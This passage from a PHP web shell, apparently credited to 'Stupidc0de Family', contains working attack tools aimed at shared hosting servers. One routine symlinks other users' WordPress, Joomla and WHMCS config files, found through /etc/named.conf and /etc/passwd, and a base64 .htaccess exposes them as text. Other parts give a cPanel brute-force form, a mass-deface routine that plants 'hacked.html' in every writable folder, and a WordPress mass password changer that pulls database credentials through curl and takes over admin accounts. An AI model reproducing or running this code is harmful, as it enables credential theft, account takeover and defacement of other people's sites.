  379.             </center>"; echo "<hr><center><b><a href=".$_SERVER['PHP_SELF']."?brute>BACK</a>"; exit; } if($_POST['mendapatkan']=='passwd'){ @set_magic_quotes_runtime(0); ob_start(); error_reporting(0); @set_time_limit(0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); $fn = $_POST['foldername']; function syml($usern,$pdomain) { symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); } $d0mains = @file("/etc/named.conf"); if($d0mains) { mkdir($fn); chdir($fn); foreach($d0mains as $d0main) { if(eregi("zone",$d0main)) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2) { $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); syml($user['name'],$domains[1][0]); } } } echo "<center><font color=springgreen size=3>Done</font></center>"; echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>Here</font></a></center>"; } else { mkdir($fn); chdir($fn); $temp = ""; $val1 = 0; $val2 = 1000; for(;$val1 <= $val2;$val1++) { $uid = @posix_getpwuid($val1); if ($uid) $temp .= join(':',$uid)."
  380. "; } echo '<br/>'; $temp = trim($temp); $file5 = fopen("test.txt","w"); fputs($file5,$temp); fclose($file5); $htaccess = 'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh
  381.             aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp
  382.             biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=
  383.             '; $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($htaccess)); $file = fopen("test.txt", "r") or exit("Unable to open file!"); while(!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; syml($matches,$matches); } fclose($file); echo "</table>"; unlink("test.txt"); echo "<center><font color=springgreen size=3>Done</font></center>"; echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>Here</font></a></center>"; } echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>"; exit; } ?>
  384.             <form method="POST" target="_blank">
  385.             <input name="page" type="hidden" value="find">
  386.                 <table border=1>
  387.                 <body bgcolor="black" text="white"><br><br>
  388.                
  389.                 <center><b><font size="2" style="italic" color="white">Cpanel BruteForce<br><br></b></center></td></tr>
  390.                 <tr>
  391.                 <td>
  392.                 <strong>User :</strong>
  393.                 </td>
  394.                 <td>
  395.                 <strong><textarea cols="50" style="background:#191818;outline:none;color:white;" rows="5" name="usernames"><?php system('ls /var/mail');?></textarea></strong>
  396.                 </td>
  397.                 <tr>
  398.                 <td>
  399.                 <strong>Pass :</strong>
  400.                 </td>
  401.                 <td>
  402.                 <strong><textarea cols="50" style="background:#191818;outline:none;color:white;" rows="5" name="passwords"></textarea></strong>
  403.                 </td>
  404.                 </tr>
  405.                 <tr>
  406.                 <td>
  407.                 <strong>Type :</strong>
  408.                 </td>
  409.                 <td>
  410.                 <span style="background:#191818;outline:none;color:white;"><strong>Simple : </strong> </span>
  411.                 <strong>
  412.                 <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
  413.                 <font style="background:black;outline:none;color:white;"><strong>/etc/passwd : </strong> </font>
  414.                 <strong>
  415.                 <input type="radio" name="type" value="passwd" style="background:black;outline:none;color:white;"></strong><span class="style3"><strong>
  416.                 </strong>
  417.                 </span>
  418.                 <td style="background:black;outline:none;color:white;"  >
  419.                 <strong><input class ='bordergaya' type="submit" value="START"></strong>
  420.                 </td>
  421.                 </tr>
  422.                 </table>
  423.                 <br>
  424.                 <table border=1>
  425.             </form>  
  426.             <tr>
  427.                 <td style="background:black;outline:none;color:white;">
  428.                     <strong>Get Wordlist</strong>
  429.             <form method="POST" target="_blank">
  430.                 <strong>
  431.             <input name="pass" type="hidden" value="password">                     
  432.                 </strong>
  433.                 <strong>Url Config :</strong>
  434.                 <td>
  435.                    
  436.                 <strong>
  437.                     <input style="background:black;outline:none;color:white;" size="80" name="url" type="text"></strong>
  438.                
  439.                 <td style="background:black;outline:none;color:white;"><strong><input class ='bordergaya' type="submit" value="GO">
  440.                 </strong>
  441.                 </td>
  442.                 </table>
  443.                 <?php  echo"<br/><br/>"; break; } elseif(isset($_GET['x']) && ($_GET['x'] == 'massde')) { ?></center></center>
  444. <style type="text/css">
  445.     .ketengah{
  446.     text-align: left;
  447.     font-size: 16px;
  448.     color: orange;
  449.     font-family: Homenaje;
  450.     margin-left: 30%;
  451. </style>
  452. <?php  function sabun_massal($path,$namafile,$isi_script) { if(is_writable($path)) { $patha = scandir($path); foreach($patha as $pathb) { $pathc = "$path/$pathb"; $lokasi = $pathc.'/'.$namafile; if($pathb === '.') { file_put_contents($lokasi, $isi_script); } elseif($pathb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($pathc)) { if(is_writable($pathc)) { echo "<font class='ketengah'><font color=crimson>-:-</font><font color=white>Sukses Bos Q</font><font color=crimson>-:-</font> <font color=springgreen>Cek di :</font> $lokasi</font><br>"; file_put_contents($lokasi, $isi_script); $idx = sabun_massal($pathc,$namafile,$isi_script); } } } } } } if($_POST['start']) { echo "<div style='margin: 5px auto; padding: 5px'>"; sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "</div>"; } else { echo "<center>"; echo "<form method='post'><br><br>
  453.     <table>
  454.     <tr>
  455.         <td><font style='text-decoration: underline; margin-left:10px;'>Folder</font></td>
  456.         <td align='center'>:</td>
  457.         <td><input class='justborder' type='text' name='d_dir' value='$path' style='width: 95%;' height='10'><br></td>
  458.     </tr>
  459.     <tr>
  460.         <td><font style='text-decoration: underline; margin-left:10px;'>Filename</font></td>
  461.         <td align='center'>:</td>
  462.         <td><input class='justborder' type='text' name='d_file' value='hacked.html' style='width: 95%;' height='10'><br></td>
  463.     </tr>
  464.     <tr>
  465.     <td colspan='3' align='center'><font style='text-decoration: underline;'>Script Deface : </font><br></td>
  466.     </tr>
  467.     <tr>
  468.     <td colspan='3'><textarea class='justborder' name='script' style='width: 500px; height: 200px;'>Hacked by Stupidc0de Family!</textarea><br></td>
  469.     </tr>
  470.     <tr>
  471.     <td colspan='3' align='center'><input class='justborder' type='submit' name='start' value='Mass Deface' style='width: 50%;'><br/></td>
  472.     </tr>
  473.     </table><br><br><br>
  474.     </form></center><br/>"; }break;?><center><center><?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'mpc')) { ?>
  475.                 <form action="?path=<?php echo $path; ?>&amp;x=mpc" method="post">
  476.                 <?php  set_time_limit(0); ini_set('display_errors', 0); echo '<center><h2>WordPress Mass Password Changer</h2><br /><br/></center>'; echo '<form method="POST" action="" >
  477.             <center><table border="1" class="justborder"><tr><td>Config List:</td>
  478.             <td><textarea class="justborder" name="url" cols="50" rows="10" ></textarea></td></tr>
  479.             <tr><td>User/Password</td><td><input class="justborder" type="text" name="username" size="25" value="Psrmrh"> /
  480.             <input class="justborder" type="text" name="password" size="25" value="stupidc0de"></td></tr></table>
  481.             <br><input class="bordergaya" type="Submit" class="button" value="Submit"><input type="hidden" name="action" value="1"></form></center>'; if ($_POST['action']=='1'){ if ($_POST['url']==''){ echo "<div class='result'>No CONFIG FOUND<br>Make sure you provided a config list!</div><br>"; }else{ $url=$_POST['url']; $users = explode("
  482. ",$url); foreach ($users as $user) { $user1=trim($user); $code=file_get_contents2($user1); preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1); $db=$b1[1][0]; preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2); $user=$b2[1][0]; preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3); $db_password=$b3[1][0]; preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4); $host=$b4[1][0]; preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5); $p=$b5[1][0]; $d=@mysql_connect( $host, $user, $db_password ) ; if ($d){ @mysql_select_db($db ); $usern=$_POST['username']; $passwd=$_POST['password']; $sql = "UPDATE `".$p."users` SET `user_pass` = MD5( '".$passwd."' ) WHERE `ID` = '1';"; @mysql_query($sql) ; ; $sql = "UPDATE `".$p."users` SET `user_login` = '".$usern."' WHERE `ID` = '1';"; @mysql_query($sql) ; ; $aa=@mysql_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;; $siteurl=@mysql_fetch_array($aa) ; $siteurl=$siteurl['option_value']; $tr.="$siteurl
  483. "; mysql_close(); } } if ($tr) $filename = 'changed.txt'; $fp = fopen($filename, "a+"); $write = fputs($fp, $tr); fclose($fp); echo "<div class='result'>Password Changing Completed ! :)<br><br>"; echo "<a href='changed.txt' target='_blank'>View List of Password Changed Sites</a></div><br/>"; } } function file_get_contents2($u){ $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,$u); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch,CURLOPT_RETURNTRANSFER,true); curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 "); $result = curl_exec($ch); return $result ; } echo "<br /><br />"; break; ?>
  484.                 <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'masstool')) { echo "<br/><br/>Monggo Pilih Toolsnya Bos Q ~_^<br/><br/>"; ?>
  485.                     <a href="?<?php echo "path=".$path; ?>&amp;x=massde"><input class=bordergaya type=submit value="Mass Deface" /></a>
  486.                     Or <a href="?<?php echo "path=".$path; ?>&amp;x=mpc"><input class=bordergaya type=submit value="Wordpress Mass Password Changer" /></a>
  487.                     Or <a href="?<?php echo "path=".$path; ?>&amp;x=zonesH"><input class=bordergaya type=submit value="Zone-H Mass Notifier" /></a>
  488.                
  489.                     <?php  break; } elseif(isset($_GET['x']) && ($_GET['x'] == 'tentang')) { echo"<br><br>
  490.                     <center><b>
